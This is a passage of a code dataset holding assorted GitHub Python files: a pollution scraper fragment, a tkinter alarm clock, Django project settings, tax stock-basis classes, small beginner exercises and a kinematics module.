pollutant_value:\n pollutant_value = pollutant_value.split(u\"\\xa0\")[0]\n else:\n pollutant_value = pollutant_value.split(u\" \")[0]\n\n pollutant_value = pollutant_value if pollutant_value != u\"No\" else None\n\n pollutant = Kind(self.name).get_dict(r_key=pollutant_name, r_val=pollutant_value)\n if pollutant:\n station_data[pollutant[u\"key\"]] = pollutant[u\"val\"]\n\n if station_data:\n items = AppItem()\n items[u\"scrap_time\"] = datetime.now(tz=timezone(SCRAPER_TIMEZONE))\n items[u\"data_time\"] = data_time\n items[u\"data_value\"] = station_data\n items[u\"source\"] = self.source\n items[u\"source_id\"] = resp.meta[u\"code\"]\n\n yield items\n\n def parse(self, response):\n for el in self.get_station_data(response):\n yield el\n\n","repo_name":"tillroy/AmbienceData","sub_path":"pollution_app_root/pollution_app/spiders/gb_england.py","file_name":"gb_england.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"5586559264","text":"'''\nAlarm Clock GUI Client\n\nRequirements:\nvlc: pip install vlc\nmutagen: pip install mutagen\npython-crontab: pip install python-crontab\n'''\n\nimport sys\nimport string\nimport vlc\nimport os\nimport getpass\nfrom time import sleep\nfrom mutagen.mp3 import MP3\nfrom crontab import CronTab\nfrom tkinter import *\n\n\nusername = getpass.getuser()\nscript_path = os.path.abspath(sys.argv[0])\n\n\nclass Window(Frame):\n\t\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master=master\n self.init_window()\n\n def init_window(self):\n self.master.title('Alarm')\n self.pack(fill=BOTH, expand=1)\n\n self.columnconfigure(1, weight=1)\n self.columnconfigure(3, pad=7)\n self.rowconfigure(3, weight=1)\n self.rowconfigure(5, pad=7)\n \n head_label = Label(self, text=\"Alarm Clock\")\n head_label.grid(padx=5, pady=5)\n\n scheduled_tasks_list_box = Listbox(self)\n scheduled_tasks_list_box.grid(row=1, column=0, columnspan=2, rowspan=4, padx=5, sticky=E+W+S+N)\n self.show_scheduled_alarms(scheduled_tasks_list_box)\n scheduled_tasks_list_box.bind(\"<>\", self.onScheduledAlarmSelect)\n\n #scrollbar_scheduled_tasks_list_box = Scrollbar(self.master, orient=\"horizontal\")\n #scrollbar_scheduled_tasks_list_box.config(command=scheduled_tasks_list_box.xview)\n #scrollbar_scheduled_tasks_list_box.pack(side=\"bottom\", fill=\"x\")\n #scheduled_tasks_list_box.config(xscrollcommand=Scrollbar.set)\n\n self.var=StringVar()\n\n\n ringnow_button = Button(self, text=\"Ring Now\", command=self.ringnow)\n ringnow_button.grid(row=1, column=3)\n \n delete_scheduled_alarm_button = Button(self, text=\"Delete Scheduled Alarm\", command= lambda: self.delete_scheduled_alarm(scheduled_tasks_list_box))\n delete_scheduled_alarm_button.grid(row=2, column=3)\n\n def show_scheduled_alarms(self, scheduled_tasks_list_box):\n scheduled_tasks_list_box.delete(0, END)\n cron_task = CronTab(user=username)\n for job in cron_task:\n if job.comment.startswith('alarm-clock-'):\n scheduled_tasks_list_box.insert(END, job)\n\n def onScheduledAlarmSelect(self, val):\n sender=val.widget\n idx=sender.curselection()\n value=sender.get(idx) \n self.var.set(value)\n\n def ringnow(self):\n alarm_file = vlc.MediaPlayer(os.path.join(os.path.dirname(script_path), \"alarm.mp3\"))\n alarm_file_length = MP3(os.path.join(os.path.dirname(script_path), \"alarm.mp3\")).info.length\n alarm_file.play()\n\n def delete_scheduled_alarm(self, scheduled_tasks_list_box):\n #import pdb\n #pdb.set_trace()\n cron_task = CronTab(user=username)\n idno = self.var.get()\n print(idno)\n for job in cron_task:\n if job.comment=='alarm-clock-'+idno:\n cron_task.remove(job)\n cron_task.write()\n self.show_scheduled_alarms(scheduled_tasks_list_box)\n\nroot = Tk()\nroot.geometry(\"400x300\")\napp = Window(root)\nroot.mainloop()","repo_name":"siddhantkhandelwal/Python-Scripts","sub_path":"alarm-clock/alarm-clock-gui.py","file_name":"alarm-clock-gui.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"37409393595","text":"#-*- coding:utf8 -*-\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '_*b844))&omdj+7)zx#1$%c4a$*cv61a)d3t=a!mr0^+ylxh2&'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nfrom constant import svr_config as Conf\n\n\n#========================Celery Settings==============\nCELERY_CONF = Conf['CELERY']\nBROKER_URL = CELERY_CONF['broker_url']\n#CELERY_RESULT_BACKEND = \"redis://:foo@localhost:6379/15\"\nCELERY_RESULT_BACKEND = CELERY_CONF['celery_result_backend']\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nDEFAULT_APPS = [\n # 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nCUSTOM_APPS = [\n 'demo',\n 'accounts',\n 'utils',\n 'blog',\n 'middleware',\n 'cache',\n 'base'\n]\n\nTHIRD_APPS = [\n 'rest_framework',\n 'corsheaders',\n 'guardian'\n]\n\nINSTALLED_APPS = DEFAULT_APPS + CUSTOM_APPS + THIRD_APPS\n\nMIDDLEWARE_CLASSES = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware', #跨域\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'devsysproj.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'devsysproj.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\nif Conf['DB']['db_type'] == 'sqlite':\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n }\nelse:\n DB_CONF = Conf['DB']\n DATABASES = {\n 'default': {\n 'ENGINE': DB_CONF['engine'],\n 'NAME': DB_CONF['dbname'],\n 'USER': DB_CONF['user'],\n 'PASSWORD': DB_CONF['password'],\n 'HOST': DB_CONF['host'],\n 'PORT': DB_CONF['port']\n }\n }\n\n# Password validation\n# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.9/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.9/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n#=================REST_FRAME_WORK SETTINGS=============\nREST_FRAMEWORK = {\n\n 'DEFAULT_RENDERER_CLASSES': (\n 'rest_framework.renderers.JSONRenderer',\n ),\n\n 'DEFAULT_AUTHENTICATION_CLASSES':(\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.BasicAuthentication'\n )\n}\n\n\n#==============CORS SETTINGS===================\nCORS_ORIGIN_ALLOW_ALL = False\n\nCORS_ALLOW_HEADERS = (\n 'accept',\n 'accept-encoding',\n 'authorization',\n 'content-type',\n 'dnt',\n 'origin',\n 'user-agent',\n 'x-csrftoken',\n 'x-requested-with',\n 'Access-Control-Allow-Origin'\n)\n\nCORS_ORIGIN_WHITELIST = (\n 'google.com',\n 'hostname.example.com',\n 'localhost:8000',\n '127.0.0.1:8080',\n '127.0.0.1:8000',\n '0.0.0.0:8080',\n 'localhost:8080',\n '192.168.1.217:8080'\n)\n\nCORS_ALLOW_CREDENTIALS = True\n\nCORS_ALLOW_METHODS = (\n 'DELETE',\n 'GET',\n 'OPTIONS',\n 'PATCH',\n 'POST',\n 'PUT',\n)\n\nCUR_PATH = os.getcwd()\n\n#=================Logging Settings===============\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'filename': '{cur_path}/log/debug.log'.format(cur_path=CUR_PATH),\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'level': 'INFO',\n 'propagate': True,\n },\n },\n}\n\n#=========Email Settings==========\nEMAIL_CONF = Conf['EMAIL']\nEMAIL_HOST = EMAIL_CONF['email_host']\nEMAIL_HOST_USER = EMAIL_CONF['email_host_user']# 用户\nEMAIL_HOST_PASSWORD = EMAIL_CONF['email_host_password'] # 密码\nEMAIL_SUBJECT_PREFIX = u'[重置密码]' # ���邮件Subject-line前缀,默认是'[django]'\nEMAIL_USE_TLS = False #与SMTP服务器通信时,是否启动TLS链接(安全链接)。默认是false\n\n\n#============Memcached Settings=======\nMEMACHED_CONF = Conf['MEMCACHED']\nMEMACHED_CONF_HOST = MEMACHED_CONF['location']\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'LOCATION': MEMACHED_CONF_HOST,\n }\n}\n\nAUTHENTICATION_BACKENDS = [\n 'django.contrib.auth.backends.ModelBackend', # default\n 'guardian.backends.ObjectPermissionBackend',\n]\n","repo_name":"EroticMango/devsys","sub_path":"devsysproj/devsysproj/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"2237097531","text":"def DruhaNeboPata(a,b,c,d,e,f):\n \n # v nejhorsim pripade 7\n ####################\n # Použijeme algoritmus na určení druheho nejtezsiho:\n # nalezneme nejtezsiho pomoci peti porovnani\n # na druheho nejtezsiho mame dva kandidaty, bud u a e/f, nebo z a x/y a a/b/c/d\n # celkem 6 nebo 7 porovnani, v nejhoršim případě 7, když je u težší než z.\n # p\n # / \\\n # u \\\n # / \\ \\\n # / \\ \\\n # x y z\n # / \\ / \\ / \\\n # a b c d e f\n # Využití možnosti vrátit i druhý nejlehčí jsem zatím nenalezl...\n\n # JeTezsi = lambda x, y: x > y\n\n vratTezsi = lambda i, j: i if JeTezsi(i ,j) else j\n\n x = vratTezsi(a, b)\n y = vratTezsi(c, d) \n z = vratTezsi(e, f)\n u = vratTezsi(x, y)\n if vratTezsi(u, z) == u:\n if u == x:\n return vratTezsi(y, z)\n else: # u == y\n return vratTezsi(x, z)\n else:\n if z == e:\n return vratTezsi(f, u)\n else:\n return vratTezsi(u, e)\n\n\n# print(DruhaNeboPata(*map(int, input().split())))","repo_name":"zdenecek/mff_stuff","sub_path":"programovani_1/cviceni_holan/secondmax.py","file_name":"secondmax.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"cs","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"1090062787","text":"# create a calculater that determines the number of times the letters \n# t, r, u, e, l, o, v, e occur in 2 names\n\n# print() greeting\n\nprint(\"Welcome to Love Calculator!\")\n\n# Ask user for both names\n\nname1 = input(\"What is your name? \\n\") \nname2 = input(\"What is thier name? \\n\")\n\n# Use lower() to make all letters lower case and easier to count\n\nname1 = name1.lower()\nname2 = name2.lower()\n\n# Create variables to store scores\n\ntotal1 = 0\ntotal2 = 0\n\n# Add together the scores\n\ntotal1 += (name1 + name2).count(\"t\")\ntotal1 += (name1 + name2).count(\"r\")\ntotal1 += (name1 + name2).count(\"u\")\ntotal1 += (name1 + name2).count(\"e\")\ntotal2 += (name1 + name2).count(\"l\")\ntotal2 += (name1 + name2).count(\"o\")\ntotal2 += (name1 + name2).count(\"v\")\ntotal2 += (name1 + name2).count(\"e\")\n\n# Concatenate the 2 int for your final score\n\ntotal = int(str(total1) + str(total2))\n\n# print() scores along with message for user\nif total < 10 or total > 90:\n print(f\"Your score is {total}, you go together like coke and mentos.\")\nelif total > 40 and total < 50:\n print(f\"Your score is {total}, you are alright together.\")\nelse:\n print(f\"Your score is {total}.\")\n ","repo_name":"JHSpaz988/-100daysofcodingpythonchallenge","sub_path":"day3/projects/love_calculator.py","file_name":"love_calculator.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"30791049574","text":"\"\"\"\n(c) 2022 Shoshi (Sharon) Cooper. No duplication is permitted for commercial use. Any significant changes made must be\nstated explicitly and the original source code, if used, must be available and credited to Shoshi (Sharon) Cooper.\n\nFor stock-related classes\n\"\"\"\nfrom TaxAlgorithms.dependencies_for_programs.aggregated_list_class import Aggregated\n\n\nclass CorporateItems(object):\n def __init__(self, fmv, ab=None, **kwargs):\n super().__init__(**kwargs)\n self.fmv = fmv\n # Adjusted basis will be calculated once it's given to the shareholder\n self.ab = ab\n\n\nclass Stock(CorporateItems):\n def __init__(self, fmv, shares, ab=None, shareholder=None, par=None, corp=None, **kwargs):\n super().__init__(fmv=fmv, ab=ab, **kwargs)\n self.shareholder = shareholder\n self.par = par\n self.shares = shares\n self.corp = corp\n\n def sell(self, shareholder, num_shares, amount):\n shareholder.shares = type(self)(amount, num_shares)\n shareholder.shares.ab = amount\n proportion = num_shares / self.shares\n gain = amount - proportion * self.ab\n self.shares -= num_shares\n self.fmv = (amount / num_shares) * self.shares\n self.ab -= proportion * self.ab\n\n self.gain_on_sale = gain\n\n # Must update amount if I have it.\n if hasattr(self, '_amount'):\n self._amount = self.ab\n\n @property\n def amount(self):\n try:\n return self._amount\n except AttributeError:\n return self.ab\n\n @amount.setter\n def amount(self, value):\n self._amount = value\n\n\n def set_holding_period(self, properties_contributed):\n \"\"\"\n We're looking at the holding period in terms of the % of a single share. If you only sold 1 share of stock\n and you had a 40% to 60% breakdown, you'd still treat 40% as short term and 60% as long term.\n \"\"\"\n self.long_term_percent = 0\n self.short_term_percent = 0\n\n if all([prop.does_holding_period_tack for prop in properties_contributed]):\n # Then set holding period to \"long term\" or longer than 1 year\n self.long_term_percent = 1\n elif all([not prop.does_holding_period_tack for prop in properties_contributed]):\n self.short_term_percent = 1\n else:\n # When you have a mixed bag of holding periods like this, we must allocate based per share based on FMV\n agg_fmv = sum([prop.fmv for prop in properties_contributed])\n for prop in properties_contributed:\n # (property fmv / aggregate fmv)\n if prop.does_holding_period_tack:\n self.long_term_percent += (prop.fmv / agg_fmv)\n else:\n self.short_term_percent += (prop.fmv / agg_fmv)\n\n def __str__(self):\n return f\"<{self.shares} in {self.corp}>\"\n\n def __repr__(self):\n return str(self)\n\n\nclass Boot(CorporateItems):\n def __init__(self, fmv):\n super().__init__(fmv)\n # The adjusted basis of boot received by the shareholder is the FMV on date of transfer\n self.ab = self.fmv\n # holding period of boot received is always a fresh start, so starts at 0\n self.holding_period = 0\n\n\nclass Bonds(Boot):\n \"\"\"Bonds and corporate debt do not count as stock for section 351\"\"\"\n pass\n\n\n\nclass VotingStock(Stock):\n pass\n\nclass NonVotingStock(Stock):\n pass\n\n\n# Partial shares\n\nclass PartialShares(object):\n\n def __init__(self, stock_object, proportion):\n self.stock_object = stock_object\n self.proportion = proportion\n\n def __getattr__(self, item):\n if item == 'stock_object' or item == 'proportion':\n return super().__getattribute__(item)\n attribute = getattr(self.stock_object, item)\n if isinstance(attribute, (int, float)):\n return attribute * self.proportion\n return attribute\n\n\n\nclass MultiplePurchases(Aggregated):\n \"\"\"Multiple Purchases of the same stock\"\"\"\n def __init__(self, iterable=(), corp_name=None):\n super().__init__(iterable)\n self.corp = corp_name\n\n\n\n\nclass CommonStock(VotingStock):\n\n def stock_dividend(self, other_stock_object):\n # Adding stock in a stock dividend or a stock split\n if not isinstance(other_stock_object, type(self)):\n # if it's a different class of stock (So preferred or class B common or something)\n total_fmv = self.fmv + other_stock_object.fmv\n basis_of_self = (self.fmv / total_fmv) * self.ab\n basis_of_other = (other_stock_object.fmv / total_fmv) * self.ab\n self.ab = basis_of_self\n other_stock_object.ab = basis_of_other\n return self, other_stock_object\n # if it's the same class of stock, then the number of shares changes so the basis per share changes, but AB\n # does not change\n self.shares += other_stock_object.shares\n return self\n\n\nclass StockRights(object):\n def __init__(self, class_of_stock, price_guaranteed, num_rights, mv_rights_pr, curr_stock):\n \"\"\"\n Class of stock -- which class of stock it is. Should be an actual Python class (in this document or otherwise)\n Price guaranteed -- guaranteed purchase price\n Num_rights -- the number of rights you received\n mv_rights_pr -- market value of rights per right\n curr_stock -- if you already own this class of stock, this is where you pass that info in.\n \"\"\"\n self.class_of_stock = class_of_stock\n self.price_guaranteed = price_guaranteed\n self.num_rights = num_rights\n self.curr_stock = curr_stock\n\n self._mv_stock_ps = self.curr_stock.fmv / self.curr_stock.shares\n self._mv_rights_pr = mv_rights_pr\n\n self.ab = 0\n\n value_of_rights = self.num_rights * self.market_value_rights_per_right\n # Must allocate from original stock if value of rights >= .15 * value of stock\n if value_of_rights >= .15 * self.curr_stock.fmv:\n self.allocate()\n\n\n def allocate(self):\n stock_value = self.market_value_stock_per_share * self.curr_stock.shares\n rights_value = self.market_value_rights_per_right * self.num_rights\n cost_of_stock = self.curr_stock.ab\n self.curr_stock.ab = round((stock_value / (stock_value + rights_value)) * cost_of_stock, 2)\n self.ab = round((rights_value / (stock_value + rights_value)) * cost_of_stock, 2)\n\n @property\n def market_value_stock_per_share(self):\n return self._mv_stock_ps\n\n @property\n def market_value_rights_per_right(self):\n return self._mv_rights_pr\n\n def exercise(self, num_rights):\n # FMV is set to None because it does not matter and is not relevant at the moment\n new_shares = self.class_of_stock(fmv=None, shares=num_rights,\n ab=(self.ab * num_rights / self.num_rights) +\n num_rights * self.price_guaranteed)\n self.ab = self.ab * (self.num_rights - num_rights) / self.num_rights\n self.num_rights -= num_rights\n return new_shares\n\n def sell(self, num_rights, price_per_right):\n capital_gain = num_rights * price_per_right - self.ab\n self.num_rights -= num_rights\n return capital_gain\n\n\ndef is_stock_nonqualified_preferred(does_holder_have_right_to_require_issuer_to_redeem_or_buy_stock: bool,\n is_issuer_required_to_redeem_buy_stock: bool, does_issuer_have_right_to_redeem_buy_stock: bool,\n likelihood_of_exercising_that_right_on_issue_date: float,\n does_dividend_rate_on_stock_vary_with_reference_to_interest_rates_commodities_etc):\n if does_holder_have_right_to_require_issuer_to_redeem_or_buy_stock:\n return True\n if is_issuer_required_to_redeem_buy_stock:\n return True\n if does_issuer_have_right_to_redeem_buy_stock:\n if likelihood_of_exercising_that_right_on_issue_date > .5:\n return True\n if does_dividend_rate_on_stock_vary_with_reference_to_interest_rates_commodities_etc:\n return True\n return False\n\n\n\n\nclass PrefStock(NonVotingStock):\n\n def __init__(self, fmv, shares, corp=None, ab=None, par=None, **kwargs):\n super().__init__(fmv=fmv, shares=shares, corp=corp, ab=ab, par=par, **kwargs)\n self._info = kwargs\n\n\nclass PreferredStock(object):\n def __new__(cls, fmv, shares, ab=None, corp=None, par=None, flat_dividend=0, dividend_rate=0,\n dividend_rate_reference_index=None, redeemable_for=(), manditorily_redeemable=False,\n holder_has_right_to_require_redemption=False, right_of_issuer_to_redeem_stock=None,\n requirement_of_issuer_to_redeem_stock=False,\n **kwargs):\n information = {'flat_dividend': flat_dividend,\n 'dividend_rate':dividend_rate,\n 'dividend_rate_reference_index': dividend_rate_reference_index,\n 'redeemable_for': redeemable_for,\n 'manditorily_redeemable': manditorily_redeemable,\n 'right_of_issuer_to_redeem_stock': right_of_issuer_to_redeem_stock,\n 'requirement_of_issuer_to_redeem_stock': requirement_of_issuer_to_redeem_stock,\n 'holder_has_right_to_require_redemption': holder_has_right_to_require_redemption\n }\n information.update(kwargs)\n\n type_of_stock = QualifiedPreferredStock\n # Check if it's nonqualified preferred stock based on the criteria below:\n counts_as_nonqualified_preferred = [\n dividend_rate_reference_index is not None,\n len(redeemable_for) > 0 or manditorily_redeemable,\n requirement_of_issuer_to_redeem_stock or holder_has_right_to_require_redemption,\n right_of_issuer_to_redeem_stock is not None\n ]\n for is_nonqualified in counts_as_nonqualified_preferred:\n if is_nonqualified:\n type_of_stock = NonQualifiedPreferredStock\n break\n\n return type_of_stock(fmv=fmv, shares=shares, ab=ab, corp=corp, par=par, **information)\n\n\n\nclass QualifiedPreferredStock(PrefStock):\n pass\n\nclass NonQualifiedPreferredStock(PrefStock, Boot):\n pass\n\n\n\n\nclass ClassesStock(object):\n \"\"\"A corporation's collection of stock classes\"\"\"\n\n class DefStck(object):\n def __init__(self, stnding):\n self.issued = stnding\n self.outstanding = stnding\n self.treasury = []\n self.par = None\n self.value = 0\n self.apic = 0\n self.shares_issued = Aggregated()\n\n def __init__(self, classes_stock_to_outstanding_shares:dict = None):\n self._information = {}\n\n if classes_stock_to_outstanding_shares is not None:\n for stck_class, outstanding in classes_stock_to_outstanding_shares.items():\n self.add_stock_class(stck_class, outstanding)\n\n def add_stock_class(self, stock_class, outstanding_shares, issued=None, treasury=0, par=None):\n \"\"\"Adds a class of stock\"\"\"\n self._information[stock_class] = self.DefStck(outstanding_shares)\n issued = issued if issued is not None else outstanding_shares\n for attr_name, attr_val in [('issued', issued), ('treasury', treasury), ('par', par)]:\n self._information[stock_class][attr_name] = attr_val\n\n def issue(self, stock_class, shares_issued, issue_price, issue_costs):\n \"\"\"Issues new stock\"\"\"\n stock_info = self[stock_class]\n if stock_info.par is None:\n stock_info['value'] += issue_price - issue_costs\n else:\n stock_info['value'] += shares_issued * stock_info.par\n stock_info['apic'] += (issue_price - (shares_issued * stock_info.par)) - issue_costs\n\n for attr_name in ['issued', 'outstanding']:\n stock_info[attr_name] += shares_issued\n\n shares = stock_class(fmv=issue_price, shares=shares_issued)\n stock_info['shares_issued'].append(shares)\n return shares\n\n def treasury_resale(self, stock_class, num_shares, total_sold_for, costs):\n \"\"\"Resells treasury stock\"\"\"\n # TODO: Do this\n raise NotImplementedError(\"Didn't do this one yet\")\n\n def buy_back(self, shares):\n \"\"\"Buys back shares as treasury stock\"\"\"\n info = self[type(shares)]\n if info.par is None:\n info.value -= shares.fmv\n else:\n info.value -= shares.shares * info.par\n info.apic -= shares.fmv - shares.shares * info.par\n\n info.outstanding -= shares.shares\n info.treasury.append(shares)\n\n\n def __getitem__(self, stock_class):\n return self._information[stock_class]\n\n\n def _add_attr(self, attr_name, start=0):\n \"\"\"Compiles an attribute across all stock classes\"\"\"\n total = start\n for stck_class, information in self._information.items():\n total += information[attr_name]\n return total\n\n @property\n def outstanding(self):\n return self._add_attr('outstanding')\n\n @property\n def fmv(self):\n return self._add_attr('value') + self._add_attr('apic')\n\n @property\n def ab(self):\n shrs = Aggregated(self._add_attr('shares_issued', []))\n return shrs.ab\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shoshicooper/TaxAlgorithms","sub_path":"TaxAlgorithms/dependencies_for_programs/classes_stock.py","file_name":"classes_stock.py","file_ext":"py","file_size_in_byte":13419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"5907244760","text":"from tkinter import *\n\nclass Application(Frame):\n \n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.pack()\n self.createWidgets()\n \n def createWidgets(self):\n top_frame = Frame(self)\n self.entry1 = Entry(top_frame)\n self.entry1.pack(side=LEFT)\n self.entry2 = Entry(top_frame)\n self.entry2.pack(side=LEFT)\n top_frame.pack()\n bottom_frame = Frame()\n self.resultlabel = Label(bottom_frame,text='Product:')\n self.resultlabel.pack()\n self.button = Button(bottom_frame,text='Multiply',command=self.handle)\n self.button.pack()\n bottom_frame.pack()\n \n def handle(self):\n entry1 = self.entry1.get()\n entry2 = self.entry2.get()\n try:\n entry1 = float(entry1)\n except ValueError:\n entry1 = False\n try:\n entry2 = float(entry2)\n except ValueError:\n entry2 = False\n if entry1 and entry2:\n product = entry1 * entry2\n else:\n product = '***ERROR***'\n self.resultlabel.config(text='Product:{0}'.format(product))\n \nroot = Tk()\napp = Application(master=root)\napp.mainloop()\n","repo_name":"aborgo/Certification_Work","sub_path":"tkinter_multiplier.py","file_name":"tkinter_multiplier.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"28608224787","text":"'''Hacer un programa que llene obligatoriamente un arreglo de numeros \r\nde 5 posiciones validados , al final debe mostrar cuantos pares e impares se encuentran en el arreglo '''\r\n\r\ndef validarNumero(n):\r\n if n.isdigit():\r\n return int(n)\r\n else:\r\n print('No es un numero')\r\n return 0\r\n\r\na = [0,0,0,0,0]\r\ncp = 0\r\nci = 0\r\nfor i in range (0,5):\r\n b = validarNumero(input ('Escribe un valor\\n'))\r\n if not b == 0:\r\n a[i] = b\r\n \r\nfor i in a:\r\n if i % 2 == 0:\r\n cp += 1\r\n else:\r\n ci += 1\r\nfor i in a:\r\n print(i)\r\n\r\nprint('Total de pares ', cp, ' y de impares' ,ci )","repo_name":"jis0017/Parcial_1_python_jesus","sub_path":"PRACTIA11.py","file_name":"PRACTIA11.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"2215098874","text":"import math\nimport numpy as np\nimport scipy as sp\n\n\n\nclass vector_td(np.matrix):\n\n def __new__(cls, input_array):\n obj = np.matrix(input_array, float).view(cls)\n \n # transposes to the matrix arithmetic order of 1 column 3 rows \n return obj.T\n\n def __str__(self):\n return 'vector_td containing elements: '+str(self)\n\n\n\nclass transformation_matrix(np.matrix):\n\n def __new__(cls, rotang=None, rotax=None, travec=None):\n obj = np.matrix(np.diagflat(np.ones(4)), float).view(cls) \n \n if travec != None or rotang or rotax != None:\n\n if travec != None:\n obj[:3,3:4] = travec\n \n if rotang or rotax != None: \n\n if rotang:\n obj.rotang = rotang\n\n if rotax != None:\n obj.rotax = rotax\n\n else:\n obj.rotax = vector_td([0,0,0])\n\n obj.matrix_rotate()\n \n else:\n print('neigther vectortd nor angle given')\n \n return obj\n\n\n def __array_finalize__(self, obj):\n self.rotang = getattr(obj, 'rotang', None)\n self.rotax = getattr(obj, 'rotax' , None)\n self.travec = getattr(obj, 'travec', None)\n\n\n def matrix_rotate(self):\n c = math.cos(math.pi/180*self.rotang)\n s = math.sin(math.pi/180*self.rotang)\n\n x = self.rotax[0]\n y = self.rotax[1]\n z = self.rotax[2]\n\n self[0,0] = c+(1-c)*(x)**2\n self[0,1] = (1-c)*x*y-s*z\n self[0,2] = (1-c)*x*z+s*y\n\n self[1,0] = (1-c)*x*y+s*z\n self[1,1] = c+(1-c)*y**2\n self[1,2] = (1-c)*y*z-s*x\n\n self[2,0] = (1-c)*x*z-s*y\n self[2,1] = (1-c)*y*z+s*x\n self[2,2] = c+(1-c)*z**2\n\n return self\n\n def __str__(self):\n return 'Transformation Matrix mit der Matrix: '+self.name+'und vom typ type(self) '\n\n\n\nclass vector_td_position(vector_td):\n\n def __new__(cls, coordinates):\n obj = vector_td(coordinates).view(cls)\n obj.matrix = transformation_matrix()\n\n return obj\n\n\n def __array_finalize__(self, obj):\n self.matrix = getattr(obj, 'matrix', None)\n\n\n def rotate(self, rotang, rotax):\n self.matrix = transformation_matrix(rotang=rotang, rotax=vector_td(rotax))[:3,:3]\n result = self.matrix * self\n\n for i in range(len(result)):\n self[i] = result[i]\n\n return self \n\n\n def transit(self, travec):\n self.matrix = transformation_matrix(travec=vector_td(travec))[:3,3:4]\n result = self.matrix + np.asmatrix(self)\n\n for i in range(len(result)):\n self[i] = result[i]\n\n return self\n \n\n def translocate(self, rotax, rotang=0, travec=np.zeros(3)):\n self.matrix = transformation_matrix(rotang=0, rotax=vector_td(0,0,0), travec=vector_td(0,0,0))\n vector = np.resize(self, (4,1))\n vector[3] = 1\n result = self.matrix * vector\n\n for i in range(3):\n self[i] = result[i]\n\n return self\n\n\n def __str__(self):\n return 'vector_td_position: '+type(self)\n\n\n\nclass td_object(list):\n\n def __new__(cls, vertex_list):\n print ('cls')\n obj = vertex_list\n obj.orient = transformation_matrix()[:3,:3]\n obj.position = vector_td_position([0,0,0])\n \n def __array_finalize__(obj, self):\n self.orient = getattr(obj, 'orient', None)\n self.position = getattr(obj, 'position', None)\n","repo_name":"JoergReinhardt/python_kinematic","sub_path":"kinematic.py","file_name":"kinematic.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
